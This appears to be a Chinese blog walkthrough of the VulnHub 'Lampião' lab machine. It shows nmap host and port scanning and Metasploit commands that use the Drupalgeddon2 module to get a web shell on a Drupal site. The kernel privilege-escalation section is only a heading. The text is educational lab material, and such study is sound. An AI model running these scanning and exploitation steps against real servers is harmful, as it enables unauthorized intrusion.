Vulnhub靶机Lampiao

最新推荐文章于 2024-08-14 15:09:27 发布
最新推荐文章于 2024-08-14 15:09:27 发布
阅读量845 收藏 5
点赞数 23
文章标签: 服务器 linux 网络 网络安全 安全 系统安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55349490/article/details/139296915
版权

环境搭建: Lampião: 1 ~ VulnHub

目录

1、信息收集:

题目没有给出靶机的账号密码。所以我们无法直接获取到靶机的IP。
这里我们利用nmap扫描,获取靶机的Ip

  • 这里我虚拟机设置的24网段为
  • nmap 192.168.0.0/24
  • 获取到 靶机的ip 192.168.0.3这里是通过靶机开放的80端口来判断是不是靶机Ip的。
    因为namp默认扫描的是常用的端口,如果靶机没有80端口。
    也可以通过nmap -p 1-65535 192.168.0.0/24来扫描全端口
  • 全端口扫描结果
    可以发现多了一个1898端口
  • 浏览器访问查看一下这应该就是靶机网站了
  • 在网页下面可以看到网页所使用的CMS为Drupal
2、web漏洞利用(msf):
  • 利用msf 查看是否存在相应的漏洞
    msfconsole
    search drupal
    use exploit/unix/webapp/drupal_drupalgeddon2
    设置目标地址与端口
    set rhost 192.168.0.3
    set rport 1898
    run 成功获取到web权限。
    getuid 查看权限,常见的web用户权限
    也可以用 shell id 查看
3、内核提权:
为几何欢
关注
  • 23
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub-Lampiao 靶机渗透
Majula
01-30 2081
WalkthroughDownloadDescriptionPen TestingInformation GatheringExploitationReview Download Lampião: 1 ~ VulnHub VM 镜像文件,直接选择 打开虚拟机 即可。 Description Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root!
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机 Lampiao
菜浪马废的博客
04-28 551
找到登录页面 cms:drupal7 可以爆破用户名 先找一下漏洞试试 伐克 尝试了半天 发现版本是7.54 用了半天7.0-7.31的 找到mysql的账号 三个账号 没能解密任何一个 试一下ssh 失败了 root就在你眼前 就是没法提权的感觉 太酸爽了 有一个用户tiago ssh爆破 我*********他 密码是这个?????? 我********* $...
Vulnhub靶机Lampiao:1 writeup
xingjinhao123的博客
01-21 4223
下载地址:https://www.vulnhub.com/entry/lampiao-1,249/ 信息搜集 获取IP地址 扫描开放的端口 80端口 80端口没有任何发现 1898端口 发现启动了Drupal 7 列举目录 发现有熟悉的rebots.txt 在CHANGELOG.txt文件里面发现了Drupal 的版本是7.54 getshell 通过Kali中的Searchsploit工具可以确定Drupal 7.5...
挑战全网最详细靶机教程——vulnhub靶机实战 lampiao【适合刚接触的新人学习】
weixin_68119378的博客
11-27 1093
靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/靶机难度:中等工具:kalilinux;一个灵活的脑子;一双手目标:得到root权限&找到flag.txt作者:木木北星声明:这里使用的技术仅用于学习交流目的,如果列出的技术用于其他任何目标,我概不负责。
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Linux日常运维小结
最新发布
lza20001103的博客
08-14 346
Linux日常运维小结
16 交换机命令行配置
weixin_48089507的博客
08-11 218
【代码】15 交换机命令行配置。
服务器数据恢复—raid5阵列热备盘未全部启用导致阵列崩溃的数据恢复案例
beiya123的博客
08-14 106
服务器存储数据恢复环境: 一台EMC某型号存储中有一组RAID5磁盘阵列。该raid5阵列中有12块硬盘,其中2块硬盘为热备盘。 服务器存储故障: 该存储raid5阵列中有两块硬盘离线,只有1块热备盘启用替换掉其中一块离线盘,另外1块热备盘未成功启用,raid5阵列崩溃,存储不可用。 磁盘阵列中硬盘离线的原因通常是磁盘存在物理故障或者硬盘出现坏道。由于EMC存储中的raid控制器的磁盘检查策略十分严格,经常将硬盘的性能不稳定判定为硬件故障并将该硬盘踢出raid。
将A服务器上指定文件夹中的文件,批量同步到B服务器
大数据-攻城狮
08-14 77
【代码】将A服务器上指定文件夹中的文件,批量同步到B服务器上。
服务器主要有什么用途?什么情况下需要服务器
txinnet的博客
08-14 137
服务器主要用于在网络中提供各种服务和资源。它们是现代信息技术基础设施的核心组成部分,用于存储、处理和管理数据,并为客户端设备(如个人电脑、移动设备等)提供所需的服务。总之,任何需要在网络上集中管理、处理或分发数据和服务的场景都可能需要使用服务器服务器可以作为集中式的数据存储点,便于团队成员访问共享文件。需要对外提供稳定且高可用性的Web服务或应用程序时。数据库服务器存储、管理和处理大量结构化数据。提供安全认证服务,控制用户对资源的访问权限。当需要实现多用户同时访问同一资源的需求时。
SaaS系统如何选择合适的服务器
qq177803623的博客
08-14 269
服务器:考虑使用云服务器(如AWS、Azure、Google Cloud等),它们提供灵活的付费模型和弹性扩展功能,可以根据实际需求动态调整服务器的配置和数量。高可用性和冗余配置:选择具有高可用性和冗余配置的服务器,如具有热备份和冗余电源的服务器,以及支持自动故障转移和备份功能的服务器集群。内存(RAM):确保服务器有足够的内存来存储系统运行时所需的数据和变量,内存大小应根据系统的规模和预期的并发用户数进行选择。防火墙和入侵检测:选择具有强大防火墙和入侵检测功能的服务器,以防止未经授权的访问和数据泄露。
超融合一体机是服务器吗?与服务器有什么区别
petaexpress的博客
08-14 137
超融合一体机不是单纯的服务器,它是一种基于超融合技术构建的IT基础设施解决方案,集成了软件和硬件,提供计算、存储和网络功能。这种一体机不仅简化了数据中心的部署、扩展和管理,还提供了高可用性、高性能的数据中心解决方案。
Linux 基本指令讲解 上
Mike的博客
08-13 1330
clear清屏Alt Enter全屏/退出全屏pwd显示当前用户所处路径cd改变目录mkdir创建一个文件夹(d)rmdir默认只能删除空文件夹(空目录)ls显示当前目录下的文件,ls 默认只会显示文件名这个属性。可以是 0 个或多个,多个选项都是用空格分隔whoami输出当前用户是谁touchrm删除文件cp拷贝命令tree以树形输出路径which输出文件的路径alias给其他命令起别名,但都是临时的,当重启后就会恢复。
脚本刷导致的服务器高并发问题及解决方案
@云安全小杜
08-14 224
在互联网服务中,尤其是在直播、游戏等行业,服务器经常面临着各种自动化脚本刷访问带来的高并发压力。这些脚本通常用于模拟正常的用户行为以达到非法目的,例如抢购、刷票、恶意爬取数据等。高并发不仅会消耗大量的服务器资源,还可能导致合法用户的正常访问受到影响。本文将介绍几种有效的技术和策略来减轻脚本刷造成的服务器高并发问题。
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值